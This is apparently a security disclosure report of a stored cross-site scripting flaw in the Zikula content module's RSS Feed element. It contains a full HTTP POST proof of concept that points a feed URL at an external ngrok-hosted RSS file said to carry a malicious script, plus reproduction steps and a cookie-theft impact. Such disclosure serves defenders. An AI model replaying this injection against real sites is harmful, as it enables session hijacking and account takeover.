Cross-site Scripting (XSS) - Stored in zikula-modules/content
Reported on
Sep 20th 2021
Description
Stored XSS in External element Feed when created Content
Proof of Concept
POST /content/item/edit?type=Zikula%5CContentModule%5CContentType%5CFeedType HTTP/2
Host: demo.ziku.la
Cookie: _zsid=5idn7q9udrp7mgirikmdlep45d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 743
Origin: https://demo.ziku.la
Referer: https://demo.ziku.la/content/admin/page/manageContent/pages/test
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
pageId=3&action=save&zikulacontentmodule_contentitem%5BcontentData%5D%5Burl%5D=https%3A%2F%2F0153-118-70-66-67.ngrok.io%2Frss.xml&zikulacontentmodule_contentitem%5BcontentData%5D%5BrefreshTime%5D=2&zikulacontentmodule_contentitem%5BcontentData%5D%5BmaxNoOfItems%5D=10&zikulacontentmodule_contentitem%5BadditionalSearchText%5D=&zikulacontentmodule_contentitem%5Bactive%5D=1&zikulacontentmodule_contentitem%5BactiveFrom%5D%5Bdate%5D=&zikulacontentmodule_contentitem%5BactiveFrom%5D%5Btime%5D=&zikulacontentmodule_contentitem%5BactiveTo%5D%5Bdate%5D=&zikulacontentmodule_contentitem%5BactiveTo%5D%5Btime%5D=&zikulacontentmodule_contentitem%5Bscope%5D%5B%5D=0&zikulacontentmodule_contentitem%5B_token%5D=OegDbUxYJbAQTRtER9vid4bqlStP5Ja6bEzCbx-Xqcs
Step to reproduce
From Content choose Create page
At Your_Page_Create choose Manage content > Add Element > External > Feed
Input URL RSS feed with containing malicious script. Example malicious RSS : Link
XSS will trigger when user click to RSS Feed
Video PoC: PoC
Impact
This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.